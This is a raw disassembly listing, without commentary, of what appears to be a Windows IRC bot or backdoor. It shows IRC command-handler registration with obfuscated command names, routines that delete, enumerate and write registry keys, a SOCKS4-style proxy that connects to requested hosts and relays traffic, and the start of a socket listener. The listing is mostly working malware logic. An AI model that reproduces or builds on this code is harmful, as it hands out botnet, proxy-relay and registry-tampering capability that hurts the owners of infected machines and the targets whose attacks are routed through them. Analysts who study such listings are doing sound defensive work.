sub_420CAE proc near ; DATA XREF: sub_420CC8+B5�o
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push 5
push 7
call sub_41D0BB
mov ecx, [esp+arg_8]
push eax
call sub_41DA6B
xor eax, eax
retn
sub_420CAE endp
; =============== S U B R O U T I N E =======================================
sub_420CC8 proc near ; CODE XREF: sub_418EDB+5A9�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
push offset sub_4338B8
push offset dword_445B20
mov ecx, esi
call sub_41C4C9
push offset sub_420399
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
mov ecx, esi
call sub_41C4C9
push offset sub_4209F2
push offset aBwIj0rhpgj1 ; "bw/Ij0rhPgj1"
mov ecx, esi
call sub_41C4C9
mov ebx, offset sub_420A75
mov ecx, esi
push ebx
push offset aFuv1h_fi8sc ; "FuV1H.fi8SC/"
call sub_41C4C9
mov edi, offset sub_41E380
mov ecx, esi
push edi
push offset aKc4l5_savs3_ ; "KC4L5.sAVS3."
call sub_41C4C9
push edi
push offset a302 ; "302"
mov ecx, esi
call sub_41C4C9
push ebx
push offset a332 ; "332"
mov ecx, esi
call sub_41C4C9
push offset sub_420C63
push offset a366 ; "366"
mov ecx, esi
call sub_41C4C9
mov edi, offset sub_420BF0
mov ecx, esi
push edi
push offset a005 ; "005"
call sub_41C4C9
push edi
push offset a376 ; "376"
mov ecx, esi
call sub_41C4C9
push edi
push offset a422 ; "422"
mov ecx, esi
call sub_41C4C9
push offset sub_420CAE
push offset a433 ; "433"
mov ecx, esi
call sub_41C4C9
pop edi
pop esi
pop ebx
retn
sub_420CC8 endp
; =============== S U B R O U T I N E =======================================
sub_420D92 proc near ; CODE XREF: sub_40A938+1485�p
; sub_40A938+156F�p
arg_0 = dword ptr 4
push esi
mov esi, dword_437174
push edi
mov edi, [esp+8+arg_0]
push edi
push offset aHkey_local_mac ; "HKEY_LOCAL_MACHINE"
call esi ; dword_437174
test eax, eax
jz loc_420E36
push edi
push offset aHklm ; "HKLM"
call esi ; dword_437174
test eax, eax
jz short loc_420E36
push edi
push offset aHkey_current_u ; "HKEY_CURRENT_USER"
call esi ; dword_437174
test eax, eax
jz short loc_420E2F
push edi
push offset aHkcu ; "HKCU"
call esi ; dword_437174
test eax, eax
jz short loc_420E2F
push edi
push offset aHkey_classes_r ; "HKEY_CLASSES_ROOT"
call esi ; dword_437174
test eax, eax
jz short loc_420E28
push edi
push offset aHkcr ; "HKCR"
call esi ; dword_437174
test eax, eax
jz short loc_420E28
push edi
push offset aHkey_current_c ; "HKEY_CURRENT_CONFIG"
call esi ; dword_437174
test eax, eax
jz short loc_420E21
push edi
push offset aHkcc ; "HKCC"
call esi ; dword_437174
test eax, eax
jz short loc_420E21
push edi
push offset aHkey_users ; "HKEY_USERS"
call esi ; dword_437174
test eax, eax
jz short loc_420E1A
push edi
push offset off_44DE10
call esi ; dword_437174
test eax, eax
jnz short loc_420E36
loc_420E1A: ; CODE XREF: sub_420D92+7A�j
mov eax, 80000003h
jmp short loc_420E3B
; ---------------------------------------------------------------------------
loc_420E21: ; CODE XREF: sub_420D92+62�j
; sub_420D92+6E�j
mov eax, 80000005h
jmp short loc_420E3B
; ---------------------------------------------------------------------------
loc_420E28: ; CODE XREF: sub_420D92+4A�j
; sub_420D92+56�j
mov eax, 80000000h
jmp short loc_420E3B
; ---------------------------------------------------------------------------
loc_420E2F: ; CODE XREF: sub_420D92+32�j
; sub_420D92+3E�j
mov eax, 80000001h
jmp short loc_420E3B
; ---------------------------------------------------------------------------
loc_420E36: ; CODE XREF: sub_420D92+16�j
; sub_420D92+26�j ...
mov eax, 80000002h
loc_420E3B: ; CODE XREF: sub_420D92+8D�j
; sub_420D92+94�j ...
pop edi
pop esi
retn
sub_420D92 endp
; =============== S U B R O U T I N E =======================================
sub_420E3E proc near ; CODE XREF: sub_42105D+158�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 4
ja short loc_420E75
jz short loc_420E6F
sub eax, 0
jz short loc_420E69
dec eax
jz short loc_420E63
dec eax
jz short loc_420E5D
dec eax
jnz short loc_420E85
mov eax, offset aReg_binary ; "REG_BINARY"
retn
; ---------------------------------------------------------------------------
loc_420E5D: ; CODE XREF: sub_420E3E+14�j
mov eax, offset aReg_expand_sz ; "REG_EXPAND_SZ"
retn
; ---------------------------------------------------------------------------
loc_420E63: ; CODE XREF: sub_420E3E+11�j
mov eax, offset aReg_sz ; "REG_SZ"
retn
; ---------------------------------------------------------------------------
loc_420E69: ; CODE XREF: sub_420E3E+E�j
mov eax, offset aReg_none ; "REG_NONE"
retn
; ---------------------------------------------------------------------------
loc_420E6F: ; CODE XREF: sub_420E3E+9�j
mov eax, offset aReg_dword ; "REG_DWORD"
retn
; ---------------------------------------------------------------------------
loc_420E75: ; CODE XREF: sub_420E3E+7�j
sub eax, 5
jz short loc_420E9D
dec eax
jz short loc_420E97
dec eax
jz short loc_420E91
sub eax, 4
jz short loc_420E8B
loc_420E85: ; CODE XREF: sub_420E3E+17�j
mov eax, offset aUnknown_0 ; "UNKNOWN"
retn
; ---------------------------------------------------------------------------
loc_420E8B: ; CODE XREF: sub_420E3E+45�j
mov eax, offset aReg_qword ; "REG_QWORD"
retn
; ---------------------------------------------------------------------------
loc_420E91: ; CODE XREF: sub_420E3E+40�j
mov eax, offset aReg_multi_sz ; "REG_MULTI_SZ"
retn
; ---------------------------------------------------------------------------
loc_420E97: ; CODE XREF: sub_420E3E+3D�j
mov eax, offset aReg_link ; "REG_LINK"
retn
; ---------------------------------------------------------------------------
loc_420E9D: ; CODE XREF: sub_420E3E+3A�j
mov eax, offset aReg_dword_big_ ; "REG_DWORD_BIG_ENDIAN"
retn
sub_420E3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420EA3 proc near ; CODE XREF: sub_418EDB+B4�p
; sub_420EA3+A8�p ...
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
push esi
push edi
mov [ebp+var_4], ebx
jz loc_420FC2
cmp [ebp+arg_8], ebx
jnz loc_420F84
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456E78 ; RegDeleteKeyA
test eax, eax
jz loc_420FB7
push 3Fh
xor eax, eax
pop ecx
lea edi, [ebp+var_10B]
mov [ebp+var_10C], bl
xor esi, esi
rep stosd
stosw
stosb
lea eax, [ebp+var_4]
mov [ebp+arg_8], 100h
push eax
push 2001Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456FA0 ; RegOpenKeyExA
test eax, eax
jnz loc_420FC2
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+arg_8]
push ebx
push eax
lea eax, [ebp+var_10C]
push eax
push ebx
push [ebp+var_4]
call dword_456E48 ; RegEnumKeyExA
mov edi, 103h
jmp short loc_420F72
; ---------------------------------------------------------------------------
loc_420F3A: ; CODE XREF: sub_420EA3+D1�j
cmp eax, ebx
jnz short loc_420F76
lea eax, [ebp+var_10C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_420EA3
add esp, 0Ch
lea ecx, [ebp+var_C]
mov eax, esi
inc esi
push ecx
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ebx
push ecx
lea ecx, [ebp+var_10C]
push ecx
push eax
push [ebp+var_4]
call dword_456E48 ; RegEnumKeyExA
loc_420F72: ; CODE XREF: sub_420EA3+95�j
cmp eax, edi
jnz short loc_420F3A
loc_420F76: ; CODE XREF: sub_420EA3+99�j
push [ebp+arg_4]
push [ebp+var_4]
call dword_456E78 ; RegDeleteKeyA
jmp short loc_420FC2
; ---------------------------------------------------------------------------
loc_420F84: ; CODE XREF: sub_420EA3+1D�j
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456FA0 ; RegOpenKeyExA
test eax, eax
jnz short loc_420FC2
push [ebp+arg_8]
push [ebp+var_4]
call dword_456E44 ; RegDeleteValueA
push [ebp+var_4]
test eax, eax
jnz short loc_420FBC
call dword_456EE8 ; RegCloseKey
loc_420FB7: ; CODE XREF: sub_420EA3+31�j
xor eax, eax
inc eax
jmp short loc_420FC4
; ---------------------------------------------------------------------------
loc_420FBC: ; CODE XREF: sub_420EA3+10C�j
call dword_456EE8 ; RegCloseKey
loc_420FC2: ; CODE XREF: sub_420EA3+14�j
; sub_420EA3+6E�j ...
xor eax, eax
loc_420FC4: ; CODE XREF: sub_420EA3+117�j
pop edi
pop esi
pop ebx
leave
retn
sub_420EA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420FC9 proc near ; CODE XREF: sub_40A708+DA�p
; sub_40A708+EF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
cmp edi, esi
mov [ebp+var_4], esi
jz short loc_421057
cmp [ebp+arg_8], esi
jz short loc_421057
lea eax, [ebp+var_4]
push eax
push 2001Fh
push esi
push edi
push [ebp+arg_0]
call dword_456FA0 ; RegOpenKeyExA
test eax, eax
jnz short loc_421053
mov eax, [ebp+arg_C]
cmp eax, 4
jnz short loc_421022
lea eax, [ebp+arg_4]
mov [ebp+arg_4], esi
push eax
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_42105D
add esp, 10h
xor eax, eax
cmp [ebp+arg_4], esi
setnz al
mov esi, eax
jmp short loc_42104A
; ---------------------------------------------------------------------------
loc_421022: ; CODE XREF: sub_420FC9+35�j
cmp eax, 1
jz short loc_421031
cmp eax, 2
jz short loc_421031
cmp eax, 7
jnz short loc_42104A
loc_421031: ; CODE XREF: sub_420FC9+5C�j
; sub_420FC9+61�j
push 1
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_421277
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
neg esi
loc_42104A: ; CODE XREF: sub_420FC9+57�j
; sub_420FC9+66�j
push [ebp+var_4]
call dword_456EE8 ; RegCloseKey
loc_421053: ; CODE XREF: sub_420FC9+2D�j
mov eax, esi
jmp short loc_421059
; ---------------------------------------------------------------------------
loc_421057: ; CODE XREF: sub_420FC9+10�j
; sub_420FC9+15�j
xor eax, eax
loc_421059: ; CODE XREF: sub_420FC9+8C�j
pop edi
pop esi
leave
retn
sub_420FC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42105D proc near ; CODE XREF: sub_420FC9+45�p
var_604 = byte ptr -604h
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 604h
push ebx
lea eax, [ebp+var_8]
push edi
xor ebx, ebx
push eax
push 0F003Fh
push ebx
mov edi, 0FAh
push [ebp+arg_4]
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_1C], edi
push [ebp+arg_0]
mov [ebp+var_14], 44Ch
mov [ebp+var_20], 80h
mov [ebp+var_4], ebx
call dword_456FA0 ; RegOpenKeyExA
test eax, eax
jnz loc_4211FB
lea eax, [ebp+var_30]
push esi
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_20]
push ebx
push eax
lea eax, [ebp+var_1B8]
push eax
push [ebp+var_8]
call dword_456EA4 ; RegQueryInfoKeyA
cmp [ebp+var_C], ebx
mov [ebp+arg_0], ebx
jz short loc_42113C
xor esi, esi
cmp [ebp+var_C], ebx
jbe short loc_42113C
loc_4210EC: ; CODE XREF: sub_42105D+DD�j
lea eax, [ebp+var_30]
mov [ebp+var_1C], edi
push eax
push ebx
push ebx
lea eax, [ebp+var_1C]
push ebx
push eax
lea eax, [ebp+var_138]
push eax
push esi
push [ebp+var_8]
call dword_456E48 ; RegEnumKeyExA
test eax, eax
jnz short loc_421133
lea eax, [ebp+var_138]
push eax
lea eax, [esi+1]
push [ebp+arg_4]
push eax
push offset a_2dSS ; "(%.2d) %s\\%s"
push [ebp+arg_8]
push [ebp+arg_C]
call sub_41CD84
add esp, 18h
inc [ebp+var_4]
loc_421133: ; CODE XREF: sub_42105D+B0�j
inc esi
inc [ebp+arg_0]
cmp esi, [ebp+var_C]
jb short loc_4210EC
loc_42113C: ; CODE XREF: sub_42105D+86�j
; sub_42105D+8D�j
cmp [ebp+var_10], ebx
jz loc_4211E7
xor edi, edi
cmp [ebp+var_10], ebx
jbe loc_4211E7
mov eax, [ebp+arg_0]
lea esi, [eax+1]
loc_421156: ; CODE XREF: sub_42105D+184�j
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_604]
push eax
push edi
push [ebp+var_8]
mov [ebp+var_14], 0FAh
mov [ebp+var_604], bl
call dword_456DE4 ; RegEnumValueA
test eax, eax
jnz short loc_4211DC
lea eax, [ebp+var_604]
push offset byte_454A34
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_4211B2
cmp [ebp+var_18], 1
jnz short loc_4211B2
lea eax, [ebp+var_604]
push offset aDefault ; "(Default)"
push eax
call sub_429A33
pop ecx
pop ecx
loc_4211B2: ; CODE XREF: sub_42105D+13A�j
; sub_42105D+140�j
push [ebp+var_18]
call sub_420E3E
push eax
lea eax, [ebp+var_604]
push eax
push [ebp+arg_4]
push esi
push offset a_2dSSS ; "(%.2d) %s\\%s (%s)"
push [ebp+arg_8]
push [ebp+arg_C]
call sub_41CD84
add esp, 20h
inc [ebp+var_4]
loc_4211DC: ; CODE XREF: sub_42105D+124�j
inc edi
inc esi
cmp edi, [ebp+var_10]
jb loc_421156
loc_4211E7: ; CODE XREF: sub_42105D+E2�j
; sub_42105D+ED�j
push [ebp+var_8]
call dword_456EE8 ; RegCloseKey
xor eax, eax
cmp [ebp+var_4], ebx
pop esi
setnle al
jmp short loc_4211FD
; ---------------------------------------------------------------------------
loc_4211FB: ; CODE XREF: sub_42105D+44�j
xor eax, eax
loc_4211FD: ; CODE XREF: sub_42105D+19C�j
pop edi
pop ebx
leave
retn
sub_42105D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421201 proc near ; CODE XREF: sub_41BB45+96�p
; sub_41BC27+1C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 4
pop eax
xor esi, esi
mov [ebp+var_10], eax
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
mov [ebp+var_4], esi
push eax
push 0F003Fh
push esi
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456FA0 ; RegOpenKeyExA
test eax, eax
jnz short loc_42126D
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
push [ebp+arg_8]
push [ebp+var_4]
call dword_456DD0 ; RegQueryValueExA
push [ebp+var_4]
test eax, eax
jnz short loc_421267
call dword_456EE8 ; RegCloseKey
mov eax, [ebp+arg_C]
mov dword ptr [eax], 1
mov eax, [ebp+var_8]
jmp short loc_421274
; ---------------------------------------------------------------------------
loc_421267: ; CODE XREF: sub_421201+50�j
call dword_456EE8 ; RegCloseKey
loc_42126D: ; CODE XREF: sub_421201+30�j
mov eax, [ebp+arg_C]
mov [eax], esi
xor eax, eax
loc_421274: ; CODE XREF: sub_421201+64�j
pop esi
leave
retn
sub_421201 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421277 proc near ; CODE XREF: sub_418EDB+5C�p
; sub_420FC9+71�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov eax, 0FFFFh
push esi
xor ebx, ebx
push eax
mov esi, offset dword_45AFC8
push ebx
push esi
mov [ebp+var_4], ebx
mov [ebp+var_8], eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456FA0 ; RegOpenKeyExA
test eax, eax
jnz short loc_421319
lea eax, [ebp+var_8]
push eax
push esi
push ebx
push ebx
push [ebp+arg_8]
push [ebp+var_4]
call dword_456DD0 ; RegQueryValueExA
test eax, eax
jnz short loc_421310
cmp [ebp+arg_C], 7
jnz short loc_421303
mov ecx, [ebp+var_8]
mov byte ptr dword_45AFC8[ecx], bl
loc_4212DB: ; CODE XREF: sub_421277+72�j
cmp ecx, ebx
jz short loc_4212EB
dec ecx
mov [ebp+var_8], ecx
cmp byte ptr dword_45AFC8[ecx], bl
jz short loc_4212DB
loc_4212EB: ; CODE XREF: sub_421277+66�j
xor edx, edx
cmp ecx, ebx
jbe short loc_421303
loc_4212F1: ; CODE XREF: sub_421277+8A�j
lea eax, dword_45AFC8[edx]
cmp [eax], bl
jnz short loc_4212FE
mov byte ptr [eax], 0Ah
loc_4212FE: ; CODE XREF: sub_421277+82�j
inc edx
cmp edx, ecx
jb short loc_4212F1
loc_421303: ; CODE XREF: sub_421277+59�j
; sub_421277+78�j
push [ebp+var_4]
call dword_456EE8 ; RegCloseKey
mov eax, esi
jmp short loc_42131B
; ---------------------------------------------------------------------------
loc_421310: ; CODE XREF: sub_421277+53�j
push [ebp+var_4]
call dword_456EE8 ; RegCloseKey
loc_421319: ; CODE XREF: sub_421277+3C�j
xor eax, eax
loc_42131B: ; CODE XREF: sub_421277+97�j
pop esi
pop ebx
leave
retn
sub_421277 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42131F proc near ; CODE XREF: sub_418EDB+2EB�p
; sub_418EDB+2F9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+var_4]
mov eax, [ebp+arg_C]
push eax
push 4
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_421387
add esp, 18h
leave
retn
sub_42131F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421340 proc near ; CODE XREF: sub_418D49+154�p
; sub_418EDB+2D5�p ...
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_10], 1
mov eax, [ebp+arg_C]
jnz short loc_421367
push eax
push [ebp+var_8]
push 1
loc_421354: ; CODE XREF: sub_421340+33�j
; sub_421340+41�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_421387
add esp, 18h
leave
retn
; ---------------------------------------------------------------------------
loc_421367: ; CODE XREF: sub_421340+C�j
cmp [ebp+arg_10], 2
jnz short loc_421375
push eax
push [ebp+var_8]
push 2
jmp short loc_421354
; ---------------------------------------------------------------------------
loc_421375: ; CODE XREF: sub_421340+2B�j
cmp [ebp+arg_10], 7
jnz short loc_421383
push eax
push [ebp+var_8]
push 7
jmp short loc_421354
; ---------------------------------------------------------------------------
loc_421383: ; CODE XREF: sub_421340+39�j
xor eax, eax
leave
retn
sub_421340 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421387 proc near ; CODE XREF: sub_42131F+17�p
; sub_421340+1D�p
var_10004 = byte ptr -10004h
var_10003 = byte ptr -10003h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_429A90
push ebx
xor ebx, ebx
lea eax, [ebp+arg_4]
push ebx
push eax
push ebx
push 20006h
push ebx
push ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456EB4 ; RegCreateKeyExA
test eax, eax
jz short loc_4213BC
xor eax, eax
jmp loc_42148C
; ---------------------------------------------------------------------------
loc_4213BC: ; CODE XREF: sub_421387+2C�j
push esi
push edi
mov edi, [ebp+arg_8]
cmp edi, ebx
jz loc_42147C
mov eax, [ebp+arg_C]
dec eax
jz loc_42148F
dec eax
jz short loc_421447
dec eax
dec eax
jz short loc_421437
sub eax, 3
jnz loc_42147F
push [ebp+arg_14]
call sub_4292D0
pop ecx
mov esi, eax
push [ebp+arg_14]
lea eax, [ebp+var_10004]
push eax
call dword_4370A4 ; lstrcpyA
xor ecx, ecx
cmp esi, ebx
mov [ebp+esi+var_10004], bl
mov [ebp+esi+var_10003], bl
jle short loc_421427
loc_421412: ; CODE XREF: sub_421387+9C�j
lea eax, [ebp+ecx+var_10004]
cmp byte ptr [eax], 0Ah
jnz short loc_421420
mov [eax], bl
loc_421420: ; CODE XREF: sub_421387+95�j
inc ecx
cmp ecx, esi
jl short loc_421412
cmp esi, ebx
loc_421427: ; CODE XREF: sub_421387+89�j
jz short loc_42142B
inc esi
inc esi
loc_42142B: ; CODE XREF: sub_421387:loc_421427�j
lea eax, [ebp+var_10004]
push esi
push eax
push 7
jmp short loc_42146D
; ---------------------------------------------------------------------------
loc_421437: ; CODE XREF: sub_421387+51�j
mov eax, [ebp+arg_10]
push 4
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
push 4
jmp short loc_42146D
; ---------------------------------------------------------------------------
loc_421447: ; CODE XREF: sub_421387+4D�j
push [ebp+arg_14]
call sub_4292D0
pop ecx
mov esi, eax
push [ebp+arg_14]
lea eax, [ebp+var_10004]
push eax
call dword_4370A4 ; lstrcpyA
inc esi
lea eax, [ebp+var_10004]
push esi
push eax
push 2
loc_42146D: ; CODE XREF: sub_421387+AE�j
; sub_421387+BE�j ...
push ebx
push edi
push [ebp+arg_4]
call dword_456F44 ; RegSetValueExA
test eax, eax
jnz short loc_42147F
loc_42147C: ; CODE XREF: sub_421387+3C�j
xor ebx, ebx
inc ebx
loc_42147F: ; CODE XREF: sub_421387+56�j
; sub_421387+F3�j
push [ebp+arg_4]
call dword_456EE8 ; RegCloseKey
pop edi
mov eax, ebx
pop esi
loc_42148C: ; CODE XREF: sub_421387+30�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42148F: ; CODE XREF: sub_421387+46�j
push [ebp+arg_14]
call sub_4292D0
pop ecx
mov esi, eax
push [ebp+arg_14]
lea eax, [ebp+var_10004]
push eax
call dword_4370A4 ; lstrcpyA
inc esi
lea eax, [ebp+var_10004]
push esi
push eax
push 1
jmp short loc_42146D
sub_421387 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4214B7 proc near ; CODE XREF: sub_4215AD+125�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_4214CD: ; CODE XREF: sub_4214B7+BB�j
; sub_4214B7+EB�j
xor ecx, ecx
mov [ebp+var_100], ebx
inc ecx
xor eax, eax
mov [ebp+var_104], ecx
loc_4214DE: ; CODE XREF: sub_4214B7+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_4214EF
inc eax
cmp eax, ecx
jb short loc_4214DE
loc_4214EF: ; CODE XREF: sub_4214B7+31�j
cmp eax, ecx
jnz short loc_421500
mov [ebp+eax*4+var_100], edx
inc [ebp+var_104]
loc_421500: ; CODE XREF: sub_4214B7+3A�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_456EFC ; select
lea eax, [ebp+var_104]
push eax
push ebx
call dword_456DB8 ; __WSAFDIsSet
test eax, eax
jz short loc_421560
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call dword_456F38 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4215A8
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz short loc_4215A8
loc_421560: ; CODE XREF: sub_4214B7+7B�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_456DB8 ; __WSAFDIsSet
test eax, eax
jz loc_4214CD
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call dword_456F38 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4215A8
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jnz loc_4214CD
loc_4215A8: ; CODE XREF: sub_4214B7+90�j
; sub_4214B7+A7�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4214B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4215AD proc near ; DATA XREF: sub_4216DB+99�o
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_420 = byte ptr -420h
var_41F = byte ptr -41Fh
var_41E = word ptr -41Eh
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 524h
push ebx
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
push edi
xor ebx, ebx
push eax
xor edi, edi
push ebx
lea eax, [ebp+var_524]
push ebx
inc edi
push eax
push ebx
mov [ebp+var_8], 5
mov [ebp+var_4], ebx
mov [ebp+var_520], esi
mov [ebp+var_524], edi
call dword_456EFC ; select
test eax, eax
jz loc_4216A0
push ebx
lea eax, [ebp+var_420]
push 408h
push eax
push esi
call dword_456F38 ; recv
test eax, eax
jle loc_4216A0
cmp [ebp+var_420], 4
jnz loc_4216A0
cmp [ebp+var_41F], 1
jnz short loc_4216A0
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_429690
mov ax, [ebp+var_41E]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_41C]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_456FB0 ; socket
mov edi, eax
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_456E9C ; connect
cmp eax, 0FFFFFFFFh
push 400h
lea eax, [ebp+var_418]
push ebx
mov [ebp+var_420], bl
push eax
jnz short loc_4216B0
mov [ebp+var_41F], 5Bh
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_420]
push ebx
push 8
push eax
push esi
call dword_456F6C ; send
loc_4216A0: ; CODE XREF: sub_4215AD+40�j
; sub_4215AD+5C�j ...
push esi
call dword_456FD0 ; closesocket
loc_4216A7: ; CODE XREF: sub_4215AD+12C�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_4216B0: ; CODE XREF: sub_4215AD+D1�j
mov [ebp+var_41F], 5Ah
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_420]
push ebx
push 8
push eax
push esi
call dword_456F6C ; send
push esi
push edi
call sub_4214B7
pop ecx
pop ecx
jmp short loc_4216A7
sub_4215AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4216DB proc near ; DATA XREF: sub_40A938+17CA�o
var_E4 = byte ptr -0E4h
var_60 = dword ptr -60h
var_44 = dword ptr -44h
var_20 = byte ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0E4h
mov eax, [ebp+arg_0]
push esi
push edi
push 31h
pop ecx
mov esi, eax
lea edi, [ebp+var_E4]
mov [ebp+var_10], 2
rep movsd
push [ebp+var_44]
xor edi, edi
inc edi
mov [eax+0BCh], edi
call dword_456F18 ; ntohs
push 6
xor esi, esi
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
call dword_456FB0 ; socket
mov edi, eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_456F4C ; bind
test eax, eax
jz short loc_421745
push [ebp+var_60]
call sub_42355A
pop ecx
push esi
call dword_437170 ; ExitThread
loc_421745: ; CODE XREF: sub_4216DB+58�j
push 0Ah
push edi
call dword_456F48 ; listen
test eax, eax
jz short loc_421762
